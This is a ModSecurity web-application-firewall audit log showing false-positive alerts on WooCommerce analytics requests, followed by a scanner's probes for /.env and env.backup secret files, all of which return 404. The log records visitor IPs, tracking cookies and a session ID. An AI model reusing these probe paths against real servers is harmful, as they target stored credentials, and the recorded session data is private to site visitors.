"/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|opalparis.store|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "opalparis.store"] [uri "/index.php"] [unique_id "aIFP1EdutIOpb_kg22h54QAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/opalparis.store/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753305044358971 2432577 (- - -) Stopwatch2: 1753305044358971 2432577; combined=16946, p1=1299, p2=15158, p3=202, p4=44, p5=242, sr=169, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --216c920a-Z-- --23656a5e-A-- [24/Jul/2025:00:10:47.388172 +0300] aIFP1FooLYw4or2LgWJ15wAAAMU 197.37.187.63 49876 127.0.0.1 7081 --23656a5e-B-- POST /?ob=open-bridge/events HTTP/1.0 Host: opalparis.store X-Real-IP: 197.37.187.63 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 839 content-type: text/plain;charset=UTF-8 accept: */* sec-fetch-site: same-origin accept-language: en-GB,en-US;q=0.9,en;q=0.8 accept-encoding: gzip, deflate, br sec-fetch-mode: cors origin: https://opalparis.store user-agent: Mozilla/5.0 (iPhone; CPU iPhone OS 18_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/22F76 Instagram 381.1.2.26.83 (iPhone11,6; iOS 18_5; en_US; en; scale=3.00; 1242x2688; IABMV/1; 737297623) referer: https://opalparis.store/product/bold-now/ sec-fetch-dest: empty cookie: _fbc=fb.1.1753304996719.PAZXh0bgNhZW0CMTAAAafA0wgWGRNQfOT18qvGf1ijM9HjDXf99sOCCBiLH3FRMx7B5sLRqXMsJNukkw_aem_W8B4TJlhSv6oA73yPq7BGQ; _fbp=fb.1.1753271801131.881201212355184295; sbjs_session=pgs%3D3%7C%7C%7Ccpg%3Dhttps%3A%2F%2Fopalparis.store%2Fproduct%2Fbold-now%2F; tk_qs=session_id%3D%26blog_id%3D245943483%26store_id%3D08cc8d12-0c1d-42f3-8519-7c52fd206c9a%26ui%3D%26url%3Dhttps%253A%252F%252Fopalparis.store%26landing_page%3D%26woo_version%3D9.9.5%26wp_version%3D6.8.1%26store_admin%3D0%26device%3Dmobile%26template_used%3D0%26additional_blocks_on_cart_page%3D%26additional_blocks_on_checkout_page%3D%26store_currency%3DEGP%26timezone%3D%252B00%253A00%26is_guest%3D1%26order_value%3D0%26order_total%3D0%26total_tax%3D0%26total_discount%3D0%26total_shipping%3D0%26products_count%3D0%26cart_page_contains_cart_block%3D1%26cart_page_contains_cart_shortcode%3D0%26checkout_page_contains_checkout_block%3D1%26checkout_page_contains_checkout_shortcode%3D0%26pi%3D981%26pn%3DBold%2520now%26pc%3DBras%252FUnderwear%26pp%3D400%26pt%3Dvariable%26lr%3D%26or%3D%26r3d%3D%26_en%3Dwoocommerceanalytics_product_view%26_ui%3D8pbHRxYVwWshauA92quN8yt7%26_ut%3Danon%26_ts%3D1753305044183%26_tz%3D-3%26_lg%3Den-GB%26_pf%3DiPhone%26_ht%3D896%26_wd%3D414%26_sx%3D0%26_sy%3D0%26_dl%3Dhttps%253A%252F%252Fopalparis.store%252Fproduct%252Fbold-now%252F%26_dr%3Dhttps%253A%252F%252Fopalparis.store%252Fproduct%252Fpush-up-bra-with-sheer-mesh%252F; woocommerce_recently_viewed=351%7C981; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_current_add=fd%3D2025-07-23%2021%3A09%3A53%7C%7C%7Cep%3Dhttps%3A%2F%2Fopalparis.store%2F%7C%7C%7Crf%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first_add=fd%3D2025-07-23%2021%3A09%3A53%7C%7C%7Cep%3Dhttps%3A%2F%2Fopalparis.store%2F%7C%7C%7Crf%3D%28none%29; sbjs_migrations=1418474375998%3D1; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28iPhone%3B%20CPU%20iPhone%20OS%2018_5%20like%20Mac%20OS%20X%29%20AppleWebKit%2F605.1.15%20%28KHTML%2C%20like%20Gecko%29%20Mobile%2F22F76%20Instagram%20381.1.2.26.83%20%28iPhone11%2C6%3B%20iOS%2018_5%3B%20en_US%3B%20en%3B%20scale%3D3.00%3B%201242x2688%3B%20IABMV%2F1%3B%20737297623%29; tk_lr=%22%22; tk_or=%22%22; tk_r3d=%22%22; tk_ai=8pbHRxYVwWshauA92quN8yt7; PHPSESSID=aqpa250unm0kdqqh9sp9jnklo1 --23656a5e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: https://opalparis.store Access-Control-Allow-Credentials: true Access-Control-Max-Age: 86400 Upgrade: h2,h2c Connection: Upgrade, close Content-Length: 0 Content-Type: text/html; charset=UTF-8 --23656a5e-E-- --23656a5e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||opalparis.store|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|opalparis.store|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||opalparis.store|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "opalparis.store"] [uri "/"] [unique_id "aIFP1FooLYw4or2LgWJ15wAAAMU"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|opalparis.store|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "opalparis.store"] [uri "/index.php"] [unique_id "aIFP1FooLYw4or2LgWJ15wAAAMU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/opalparis.store/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753305044360844 3027635 (- - -) Stopwatch2: 1753305044360844 3027635; combined=27297, p1=1463, p2=25250, p3=312, p4=52, p5=219, sr=160, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --23656a5e-Z-- --2a402b74-A-- [24/Jul/2025:00:11:11.314583 +0300] aIFP7VooLYw4or2LgWJ2EwAAANI 197.37.187.63 41920 127.0.0.1 7081 --2a402b74-B-- POST /?ob=open-bridge/events HTTP/1.0 Host: opalparis.store X-Real-IP: 197.37.187.63 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 1004 content-type: text/plain;charset=UTF-8 accept: */* sec-fetch-site: same-origin accept-language: en-GB,en-US;q=0.9,en;q=0.8 accept-encoding: gzip, deflate, br sec-fetch-mode: cors origin: https://opalparis.store user-agent: Mozilla/5.0 (iPhone; CPU iPhone OS 18_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/22F76 Instagram 381.1.2.26.83 (iPhone11,6; iOS 18_5; en_US; en; scale=3.00; 1242x2688; IABMV/1; 737297623) referer: https://opalparis.store/product/soft-hug/ sec-fetch-dest: empty cookie: _fbc=fb.1.1753304996719.PAZXh0bgNhZW0CMTAAAafA0wgWGRNQfOT18qvGf1ijM9HjDXf99sOCCBiLH3FRMx7B5sLRqXMsJNukkw_aem_W8B4TJlhSv6oA73yPq7BGQ; _fbp=fb.1.1753271801131.881201212355184295; sbjs_session=pgs%3D4%7C%7C%7Ccpg%3Dhttps%3A%2F%2Fopalparis.store%2Fproduct%2Fsoft-hug%2F; tk_qs=session_id%3D%26blog_id%3D245943483%26store_id%3D08cc8d12-0c1d-42f3-8519-7c52fd206c9a%26ui%3D%26url%3Dhttps%253A%252F%252Fopalparis.store%26landing_page%3D%26woo_version%3D9.9.5%26wp_version%3D6.8.1%26store_admin%3D0%26device%3Dmobile%26template_used%3D0%26additional_blocks_on_cart_page%3D%26additional_blocks_on_checkout_page%3D%26store_currency%3DEGP%26timezone%3D%252B00%253A00%26is_guest%3D1%26order_value%3D0%26order_total%3D0%26total_tax%3D0%26total_discount%3D0%26total_shipping%3D0%26products_count%3D0%26cart_page_contains_cart_block%3D1%26cart_page_contains_cart_shortcode%3D0%26checkout_page_contains_checkout_block%3D1%26checkout_page_contains_checkout_shortcode%3D0%26pi%3D858%26pn%3DSoft%2520hug%26pc%3DBras%252FUnderwear%26pp%3D350%26pt%3Dvariable%26lr%3D%26or%3D%26r3d%3D%26_en%3Dwoocommerceanalytics_product_view%26_ui%3D8pbHRxYVwWshauA92quN8yt7%26_ut%3Danon%26_ts%3D1753305069062%26_tz%3D-3%26_lg%3Den-GB%26_pf%3DiPhone%26_ht%3D896%26_wd%3D414%26_sx%3D0%26_sy%3D0%26_dl%3Dhttps%253A%252F%252Fopalparis.store%252Fproduct%252Fsoft-hug%252F%26_dr%3Dhttps%253A%252F%252Fopalparis.store%252Fproduct%252Fbold-now%252F; woocommerce_recently_viewed=351%7C981%7C858; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_current_add=fd%3D2025-07-23%2021%3A09%3A53%7C%7C%7Cep%3Dhttps%3A%2F%2Fopalparis.store%2F%7C%7C%7Crf%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first_add=fd%3D2025-07-23%2021%3A09%3A53%7C%7C%7Cep%3Dhttps%3A%2F%2Fopalparis.store%2F%7C%7C%7Crf%3D%28none%29; sbjs_migrations=1418474375998%3D1; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28iPhone%3B%20CPU%20iPhone%20OS%2018_5%20like%20Mac%20OS%20X%29%20AppleWebKit%2F605.1.15%20%28KHTML%2C%20like%20Gecko%29%20Mobile%2F22F76%20Instagram%20381.1.2.26.83%20%28iPhone11%2C6%3B%20iOS%2018_5%3B%20en_US%3B%20en%3B%20scale%3D3.00%3B%201242x2688%3B%20IABMV%2F1%3B%20737297623%29; tk_lr=%22%22; tk_or=%22%22; tk_r3d=%22%22; tk_ai=8pbHRxYVwWshauA92quN8yt7; PHPSESSID=aqpa250unm0kdqqh9sp9jnklo1 --2a402b74-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: https://opalparis.store Access-Control-Allow-Credentials: true Access-Control-Max-Age: 86400 Upgrade: h2,h2c Connection: Upgrade, close Content-Length: 0 Content-Type: text/html; charset=UTF-8 --2a402b74-E-- --2a402b74-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||opalparis.store|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|opalparis.store|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||opalparis.store|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "opalparis.store"] [uri "/"] [unique_id "aIFP7VooLYw4or2LgWJ2EwAAANI"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|opalparis.store|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "opalparis.store"] [uri "/index.php"] [unique_id "aIFP7VooLYw4or2LgWJ2EwAAANI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/opalparis.store/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753305069203092 2111773 (- - -) Stopwatch2: 1753305069203092 2111773; combined=21270, p1=1079, p2=19699, p3=235, p4=55, p5=201, sr=157, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2a402b74-Z-- --13dad273-A-- [24/Jul/2025:00:11:11.911643 +0300] aIFP7VooLYw4or2LgWJ2EgAAAM0 197.37.187.63 41910 127.0.0.1 7081 --13dad273-B-- POST /?ob=open-bridge/events HTTP/1.0 Host: opalparis.store X-Real-IP: 197.37.187.63 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 693 content-type: text/plain;charset=UTF-8 accept: */* sec-fetch-site: same-origin accept-language: en-GB,en-US;q=0.9,en;q=0.8 accept-encoding: gzip, deflate, br sec-fetch-mode: cors origin: https://opalparis.store user-agent: Mozilla/5.0 (iPhone; CPU iPhone OS 18_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/22F76 Instagram 381.1.2.26.83 (iPhone11,6; iOS 18_5; en_US; en; scale=3.00; 1242x2688; IABMV/1; 737297623) referer: https://opalparis.store/product/soft-hug/ sec-fetch-dest: empty cookie: _fbc=fb.1.1753304996719.PAZXh0bgNhZW0CMTAAAafA0wgWGRNQfOT18qvGf1ijM9HjDXf99sOCCBiLH3FRMx7B5sLRqXMsJNukkw_aem_W8B4TJlhSv6oA73yPq7BGQ; _fbp=fb.1.1753271801131.881201212355184295; sbjs_session=pgs%3D4%7C%7C%7Ccpg%3Dhttps%3A%2F%2Fopalparis.store%2Fproduct%2Fsoft-hug%2F; tk_qs=session_id%3D%26blog_id%3D245943483%26store_id%3D08cc8d12-0c1d-42f3-8519-7c52fd206c9a%26ui%3D%26url%3Dhttps%253A%252F%252Fopalparis.store%26landing_page%3D%26woo_version%3D9.9.5%26wp_version%3D6.8.1%26store_admin%3D0%26device%3Dmobile%26template_used%3D0%26additional_blocks_on_cart_page%3D%26additional_blocks_on_checkout_page%3D%26store_currency%3DEGP%26timezone%3D%252B00%253A00%26is_guest%3D1%26order_value%3D0%26order_total%3D0%26total_tax%3D0%26total_discount%3D0%26total_shipping%3D0%26products_count%3D0%26cart_page_contains_cart_block%3D1%26cart_page_contains_cart_shortcode%3D0%26checkout_page_contains_checkout_block%3D1%26checkout_page_contains_checkout_shortcode%3D0%26pi%3D858%26pn%3DSoft%2520hug%26pc%3DBras%252FUnderwear%26pp%3D350%26pt%3Dvariable%26lr%3D%26or%3D%26r3d%3D%26_en%3Dwoocommerceanalytics_product_view%26_ui%3D8pbHRxYVwWshauA92quN8yt7%26_ut%3Danon%26_ts%3D1753305069062%26_tz%3D-3%26_lg%3Den-GB%26_pf%3DiPhone%26_ht%3D896%26_wd%3D414%26_sx%3D0%26_sy%3D0%26_dl%3Dhttps%253A%252F%252Fopalparis.store%252Fproduct%252Fsoft-hug%252F%26_dr%3Dhttps%253A%252F%252Fopalparis.store%252Fproduct%252Fbold-now%252F; woocommerce_recently_viewed=351%7C981%7C858; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_current_add=fd%3D2025-07-23%2021%3A09%3A53%7C%7C%7Cep%3Dhttps%3A%2F%2Fopalparis.store%2F%7C%7C%7Crf%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first_add=fd%3D2025-07-23%2021%3A09%3A53%7C%7C%7Cep%3Dhttps%3A%2F%2Fopalparis.store%2F%7C%7C%7Crf%3D%28none%29; sbjs_migrations=1418474375998%3D1; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28iPhone%3B%20CPU%20iPhone%20OS%2018_5%20like%20Mac%20OS%20X%29%20AppleWebKit%2F605.1.15%20%28KHTML%2C%20like%20Gecko%29%20Mobile%2F22F76%20Instagram%20381.1.2.26.83%20%28iPhone11%2C6%3B%20iOS%2018_5%3B%20en_US%3B%20en%3B%20scale%3D3.00%3B%201242x2688%3B%20IABMV%2F1%3B%20737297623%29; tk_lr=%22%22; tk_or=%22%22; tk_r3d=%22%22; tk_ai=8pbHRxYVwWshauA92quN8yt7; PHPSESSID=aqpa250unm0kdqqh9sp9jnklo1 --13dad273-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: https://opalparis.store Access-Control-Allow-Credentials: true Access-Control-Max-Age: 86400 Upgrade: h2,h2c Connection: Upgrade, close Content-Length: 0 Content-Type: text/html; charset=UTF-8 --13dad273-E-- --13dad273-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||opalparis.store|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|opalparis.store|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||opalparis.store|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "opalparis.store"] [uri "/"] [unique_id "aIFP7VooLYw4or2LgWJ2EgAAAM0"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|opalparis.store|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "opalparis.store"] [uri "/index.php"] [unique_id "aIFP7VooLYw4or2LgWJ2EgAAAM0"] Apache-Handler: proxy:unix:/var/www/vhosts/system/opalparis.store/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753305069201398 2710438 (- - -) Stopwatch2: 1753305069201398 2710438; combined=21125, p1=847, p2=19783, p3=243, p4=52, p5=199, sr=156, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --13dad273-Z-- --e0f92c0a-A-- [24/Jul/2025:00:20:09.742360 +0300] aIFSCVooLYw4or2LgWJ5JQAAAM0 185.177.72.9 39570 127.0.0.1 7081 --e0f92c0a-B-- GET /.env HTTP/1.0 Host: webmail.itilebanon.com X-Real-IP: 185.177.72.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e0f92c0a-F-- HTTP/1.1 404 Not Found Content-Length: 269 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0f92c0a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "webmail.itilebanon.com"] [uri "/.env"] [unique_id "aIFSCVooLYw4or2LgWJ5JQAAAM0"] Stopwatch: 1753305609737574 4851 (- - -) Stopwatch2: 1753305609737574 4851; combined=2590, p1=491, p2=1977, p3=23, p4=32, p5=67, sr=147, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e0f92c0a-Z-- --4219b339-A-- [24/Jul/2025:00:20:10.068782 +0300] aIFSClooLYw4or2LgWJ5KgAAANE 185.177.72.9 39626 127.0.0.1 7081 --4219b339-B-- GET /backend/.env HTTP/1.0 Host: webmail.itilebanon.com X-Real-IP: 185.177.72.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --4219b339-F-- HTTP/1.1 404 Not Found Content-Length: 269 Connection: close Content-Type: text/html; charset=iso-8859-1 --4219b339-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "webmail.itilebanon.com"] [uri "/backend/.env"] [unique_id "aIFSClooLYw4or2LgWJ5KgAAANE"] Stopwatch: 1753305610063049 5804 (- - -) Stopwatch2: 1753305610063049 5804; combined=4083, p1=2048, p2=1914, p3=25, p4=34, p5=62, sr=186, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4219b339-Z-- --f5722426-A-- [24/Jul/2025:00:20:13.638540 +0300] aIFSDVooLYw4or2LgWJ5OQAAAMU 185.177.72.9 35392 127.0.0.1 7081 --f5722426-B-- GET /api/.env HTTP/1.0 Host: webmail.itilebanon.com X-Real-IP: 185.177.72.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f5722426-F-- HTTP/1.1 404 Not Found Content-Length: 269 Connection: close Content-Type: text/html; charset=iso-8859-1 --f5722426-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "webmail.itilebanon.com"] [uri "/api/.env"] [unique_id "aIFSDVooLYw4or2LgWJ5OQAAAMU"] Stopwatch: 1753305613630204 8397 (- - -) Stopwatch2: 1753305613630204 8397; combined=5641, p1=1039, p2=4471, p3=26, p4=34, p5=71, sr=574, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f5722426-Z-- --0fe50d2f-A-- [24/Jul/2025:00:20:13.701268 +0300] aIFSDVooLYw4or2LgWJ5OgAAAM0 185.177.72.9 35396 127.0.0.1 7081 --0fe50d2f-B-- GET /env.backup HTTP/1.0 Host: webmail.itilebanon.com X-Real-IP: 185.177.72.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --0fe50d2f-F-- HTTP/1.1 404 Not Found Content-Length: 269 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fe50d2f-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||webmail.itilebanon.com|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||webmail.itilebanon.com|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "webmail.itilebanon.com"] [uri "/env.backup"] [unique_id "aIFSDVooLYw4or2LgWJ5OgAAAM0"] Stopwatch: 1753305613696248 5151 (- - -) Stopwatch2: 1753305613696248 5151; combined=3098, p1=525, p2=2429, p3=26, p4=36, p5=82, sr=173, sw=0, l=0, gc=0 